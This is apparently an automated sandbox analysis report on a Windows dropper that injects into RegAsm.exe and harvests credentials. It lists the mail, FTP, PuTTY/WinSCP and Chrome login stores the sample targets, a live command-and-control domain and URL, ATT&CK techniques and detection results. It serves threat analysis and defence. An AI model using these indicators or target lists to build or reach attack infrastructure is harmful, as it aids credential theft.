                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.ConsoleHost\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.ConsoleHost.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Numerics\v4.0_4.0.0.0__b77a5c561934e089\System.Numerics.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.DirectoryServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.DirectoryServices.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Management\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Security\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Security.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Utility\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Utility.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Configuration.Install\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Configuration.Install.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package00113~31bf3856ad364e35~amd64~~10.0.17134.1.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

Stealing of Sensitive Information

Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe PID: 5092, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: RegAsm.exe PID: 2084, type: MEMORYSTR
Source: Yara match | File source: dump.pcap, type: PCAP
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 14.0.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

MITRE ATT&CK matrix (listed per tactic instead of the original 14-column grid; a number in parentheses is the count shown next to that technique in the original matrix):

Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
Execution: PowerShell (1); Scheduled Task/Job; At (Linux); At (Windows); Cron; Launchd; Scheduled Task; Command and Scripting Interpreter
Persistence: DLL Side-Loading (1); Boot or Logon Initialization Scripts; Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Privilege Escalation: Process Injection (211); DLL Side-Loading (1); Logon Script (Windows); Logon Script (Mac); Network Logon Script; Rc.common; Startup Items; Scheduled Task/Job
Defense Evasion: Masquerading (1); Disable or Modify Tools (1); Virtualization/Sandbox Evasion (21); Process Injection (211); Deobfuscate/Decode Files or Information (1); Obfuscated Files or Information (1); Software Packing (1); DLL Side-Loading (1)
Credential Access: OS Credential Dumping (2); Credentials in Registry (1); Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
Discovery: Security Software Discovery (1); Process Discovery (1); Virtualization/Sandbox Evasion (21); Application Window Discovery (1); Remote System Discovery (1); File and Directory Discovery (1); System Information Discovery (13); Network Service Scanning
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Shared Webroot
Collection: Email Collection (1); Archive Collected Data (1); Data from Local System (2); Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol; Exfiltration Over Symmetric Encrypted Non-C2 Protocol
Command and Control: Encrypted Channel (1); Non-Application Layer Protocol (2); Application Layer Protocol (112); Protocol Impersonation; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication; Jamming or Denial of Service; Rogue Wi-Fi Access Points; Downgrade to Insecure Protocols
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Carrier Billing Fraud; Manipulate App Store Rankings or Ratings; Abuse Accessibility Features; Data Encrypted for Impact; Generate Fraudulent Advertising Revenue
[Behavior graph; rendered as an image in the original report. Recoverable details:]
Behavior Graph ID: 756117 | Sample: SecuriteInfo.com.Win32.Drop... | Startdate: 29/11/2022 | Architecture: WINDOWS | Score: 100
Top-level: domain sedesadre.gq; signatures: Snort IDS alert for network traffic; Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; 6 other signatures.
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe (started): contacts 192.168.2.1 (unknown unknown), onedrive.live.com and 3 other IPs or domains; dropped SecuriteInfo.com.W....15139.3101.exe.log (ASCII); signatures: Encrypted powershell cmdline option found; Writes to foreign memory regions; Injects a PE file into a foreign processes. Starts RegAsm.exe, powershell.exe, powershell.exe and svchost.exe.
RegAsm.exe: contacts sedesadre.gq 141.98.6.102 (ports 49716, 49717, 49718; CMCSUS, Germany); signatures: Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc); Tries to steal Mail credentials (via file / registry access); Tries to harvest and steal ftp login credentials; Tries to harvest and steal browser information (history, passwords, etc).
Each powershell.exe starts a conhost.exe.

Source | Detection | Scanner | Label | Link
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | 15% | ReversingLabs | ByteCode-MSIL.Trojan.Bsymem |
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | 100% | Avira | HEUR/AGEN.1202504 |
SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
Source | Detection | Scanner | Label | Link | Download
14.0.RegAsm.exe.400000.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | |
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.42b9b20.1.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | |
0.2.SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe.4291b00.0.unpack | 100% | Avira | TR/Crypt.XPACK.Gen | |
No Antivirus matches
Source | Detection | Scanner | Label | Link
http://www.ibsensoftware.com/ | 0% | URL Reputation | safe |
https://contoso.com/License | 0% | URL Reputation | safe |
https://contoso.com/ | 0% | URL Reputation | safe |
http://kbfvzoboss.bid/alien/fre.php | 0% | URL Reputation | safe |
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe |
http://alphastand.top/alien/fre.php | 0% | URL Reputation | safe |
https://go.micro | 0% | URL Reputation | safe |
https://contoso.com/Icon | 0% | URL Reputation | safe |
http://alphastand.win/alien/fre.php | 0% | URL Reputation | safe |
http://alphastand.trade/alien/fre.php | 0% | URL Reputation | safe |
http://james.newtonking.com/projects/json | 0% | URL Reputation | safe |
https://dynamic.t | 0% | URL Reputation | safe |
https://edi4gw.db.files.1drv.com4 | 0% | Avira URL Cloud | safe |
http://sedesadre.gq/PKZ/PWS/fre.php | 0% | Avira URL Cloud | safe |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
l-0003.l-dc-msedge.net | 13.107.43.12 | true | false | | unknown
sedesadre.gq | 141.98.6.102 | true | true | | unknown
onedrive.live.com | unknown | unknown | false | | high
edi4gw.db.files.1drv.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://sedesadre.gq/PKZ/PWS/fre.php | true | Avira URL Cloud: safe | unknown
http://kbfvzoboss.bid/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.top/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.win/alien/fre.php | true | URL Reputation: safe | unknown
http://alphastand.trade/alien/fre.php | true | URL Reputation: safe | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
https://edi4gw.db.files.1drv.com4 | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519404605.00000000030D1000.00000004.00000800.00020000.00000000.sdmp | false | Avira URL Cloud: safe | unknown
https://dev.ditu.live.com/REST/v1/Routes/ | svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Routes/Driving | svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/comp/gen.ashx | svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://www.ibsensoftware.com/ | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.528024280.00000000042B9000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521045812.0000000003211000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.527878465.0000000004291000.00000004.00000800.00020000.00000000.sdmp, RegAsm.exe, 0000000E.00000000.513552356.0000000000415000.00000040.00000400.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.ditu.live.com/REST/v1/Traffic/Incidents/ | svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.tiles.ditu.live.com/tiles/gen | svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/License | powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/Walking | svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024%21128&authkey=AFWFoMk | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe | false | | high
https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n= | svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/logging.ashx | svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/REST/v1/Imagery/Copyright/ | svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gri?pv=1&r= | svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Transit/Schedules/ | svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321132883.0000014604A42000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://contoso.com/ | powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.401922859.0000000004961000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.bingmapsportal.com | svchost.exe, 00000005.00000002.320847106.0000014604A13000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/REST/v1/Imagery/Copyright/ | svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dynamic.t0.tiles.ditu.live.com/comp/gen.ashx | svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdv?pv=1&r= | svchost.exe, 00000005.00000002.321224479.0000014604A55000.00000004.00000020.00020000.00000000.sdmp | false | | high
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://onedrive.live.com | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://go.micro | powershell.exe, 00000001.00000002.420135572.00000000051CD000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dev.virtualearth.net/REST/v1/Routes/ | svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://onedrive.live.com/download?cid=9A063D4B0D931024&resid=9A063D4B0D931024 | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.518826525.0000000003087000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://contoso.com/Icon | powershell.exe, 00000001.00000002.423054874.00000000059BE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gdi?pv=1&r= | svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log? | svchost.exe, 00000005.00000003.319937311.0000014604A40000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://t0.ssl.ak.dynamic.tiles.virtualearth.net/odvs/gd?pv=1&r= | svchost.exe, 00000005.00000002.321088494.0000014604A3C000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.320944817.0000014604A27000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000005.00000002.321163191.0000014604A4E000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/REST/v1/Locations | svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://ecn.dev.virtualearth.net/mapcontrol/mapconfiguration.ashx?name=native&v= | svchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://dev.virtualearth.net/mapcontrol/logging.ashx | svchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmp | false | | high
https://github.com/Pester/Pester | powershell.exe, 00000001.00000002.404488163.0000000004A9B000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://james.newtonking.com/projects/json | SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.521644432.000000000327E000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.519732360.0000000003147000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                                      https://dynamic.api.tiles.ditu.live.com/odvs/gdi?pv=1&r=svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        high
                                                                                        https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          high
                                                                                          https://dynamic.tsvchost.exe, 00000005.00000003.319680997.0000014604A48000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                          • URL Reputation: safe
                                                                                          unknown
                                                                                          https://dev.virtualearth.net/REST/v1/Routes/Transitsvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                            high
                                                                                            https://www.newtonsoft.com/jsonschemaSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              high
                                                                                              https://t0.ssl.ak.tiles.virtualearth.net/tiles/gensvchost.exe, 00000005.00000003.297637720.0000014604A31000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321064418.0000014604A3A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                high
                                                                                                https://www.nuget.org/packages/Newtonsoft.Json.BsonSecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000002.531258657.0000000006C30000.00000004.08000000.00040000.00000000.sdmp, SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe, 00000000.00000003.490102974.00000000045F2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                  high
                                                                                                  https://dynamic.api.tiles.ditu.live.com/odvs/gdv?pv=1&r=svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                    high
                                                                                                    https://dev.ditu.live.com/REST/v1/Locationssvchost.exe, 00000005.00000003.319788458.0000014604A5F000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                      high
                                                                                                      https://dev.ditu.live.com/REST/v1/JsonFilter/VenueMaps/data/svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmp, svchost.exe, 00000005.00000002.321240546.0000014604A5C000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                        high
                                                                                                        https://dynamic.api.tiles.ditu.live.com/odvs/gd?pv=1&r=svchost.exe, 00000005.00000003.319889828.0000014604A59000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                          high
IP | Domain | Country | ASN | ASN Name | Malicious
141.98.6.102 | sedesadre.gq | Germany | 33657 | CMCSUS | true

Private IP
192.168.2.1
Joe Sandbox Version: 36.0.0 Rainbow Opal
Analysis ID: 756117
Start date and time: 2022-11-29 16:49:18 +01:00
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 9m 29s
Hypervisor based Inspection enabled: false
Report type: full
Sample file name: SecuriteInfo.com.Win32.DropperX-gen.15139.3101.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 15
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@10/9@21/2
EGA Information:
• Successful, ratio: 100%
HDC Information: Failed
HCA Information:
